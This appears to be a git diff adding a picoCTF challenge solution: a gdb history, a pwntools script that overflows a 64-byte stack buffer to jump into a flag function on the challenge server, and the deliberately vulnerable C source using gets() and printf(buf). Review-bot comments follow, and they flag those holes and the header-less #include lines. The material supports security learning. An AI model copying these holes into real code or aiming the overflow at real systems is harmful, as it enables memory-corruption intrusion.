diff --git a/x-sixty-what/.gdb_history b/x-sixty-what/.gdb_history
new file mode 100644
index 0000000..81b5ded
--- /dev/null
+++ b/x-sixty-what/.gdb_history
@@ -0,0 +1,25 @@
+show vuln
+list vuln
+b vuln
+exit
+info functions
+list main
+disassemble main
+disasm main
+disassemble main
+disassemble *main
+b vuln
+exit
+disassemble main
+disassemble vuln
+b vuln+2
+b *vuln+2
+exit
+disassemble vuln
+b *vuln+24
+run
+stackf
+nexti
+stackf
+disassemble flag
+exit
diff --git a/x-sixty-what/sol.py b/x-sixty-what/sol.py
new file mode 100755
index 0000000..2fc31e6
--- /dev/null
+++ b/x-sixty-what/sol.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python
+from pwn import *
+
+buffer_base = 0x7fffffffcf70
+ret_addr = 0x7fffffffcfb8
+ret_offset = ret_addr - buffer_base
+flag_fun_addr = 0x0000000000401236
+flag_fun_offset = 5
+target_addr = flag_fun_addr + flag_fun_offset
+
+send_buffer = b"a"*ret_offset + p64(target_addr, 'little')
+
+#conn = process("./vuln")
+conn = remote('saturn.picoctf.net', 60832)
+
+conn.recvline()
+conn.sendline(send_buffer)
+conn.interactive()
+
diff --git a/x-sixty-what/vuln b/x-sixty-what/vuln
new file mode 100755
index 0000000..4f16c68
Binary files /dev/null and b/x-sixty-what/vuln differ
diff --git a/x-sixty-what/vuln.c b/x-sixty-what/vuln.c
new file mode 100644
index 0000000..fc76b33
--- /dev/null
+++ b/x-sixty-what/vuln.c
@@ -0,0 +1,37 @@
+#include
+#include
+#include
+#include
+#include
+
+#define BUFFSIZE 64
+#define FLAGSIZE 64
+
+void flag() {
+ char buf[FLAGSIZE];
+ FILE *f = fopen("flag.txt","r");
+ if (f == NULL) {
+ printf("%s %s", "Please create 'flag.txt' in this directory with your",
+ "own debugging flag.\n");
+ exit(0);
+ }
+
+ fgets(buf,FLAGSIZE,f);
+ printf(buf);
+}
+
+void vuln(){
+ char buf[BUFFSIZE];
+ gets(buf);
+}
+
+int main(int argc, char **argv){
+
+ setvbuf(stdout, NULL, _IONBF, 0);
+ gid_t gid = getegid();
+ setresgid(gid, gid, gid);
+ puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
+ vuln();
+ return 0;
+}
+
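Review bot: `.gdb_history` is a debugger session artifact, not part of the solution, and should not be committed; add `.gdb_history` to the repository's `.gitignore` (or point GDB's history file outside the tree) and drop it from this commit. Nothing is lost by removing it, since the addresses the session produced are already recorded as constants in sol.py.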
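Review bot: The shebang `#!/usr/bin/env python` may resolve to Python 2 or to no interpreter at all on current systems, while present-day pwntools is written for Python 3; `#!/usr/bin/env python3` pins the interpreter the script actually needs. In `p64(target_addr, 'little')` the endianness is passed positionally, which depends on p64's parameter order, and little-endian is already pwntools' default for this context, so `p64(target_addr)` expresses the same thing without the ambiguity. The return value of `conn.recvline()` is discarded, which is fine, but a short comment such as `# consume the banner line before sending` would tell a reader why the call is there.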
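Review bot: The five `#include` lines at the top of the hunk carry no header name, so the file as shown does not compile; the angle-bracketed names (e.g. `<stdio.h>` for `fopen`/`fgets`/`printf`) were presumably stripped in rendering, and the checked-in file is worth verifying. Beyond that, the file is the intentionally vulnerable challenge source: `gets(buf)` in `vuln` reads unbounded input into a 64-byte buffer (the function has been removed from C11), and `printf(buf)` in `flag` uses file content as the format string. The bounded forms are `fgets(buf, BUFFSIZE, stdin)` and `printf("%s", buf)`; `flag` already uses `fgets` for its own file read, so the two functions would then be consistent.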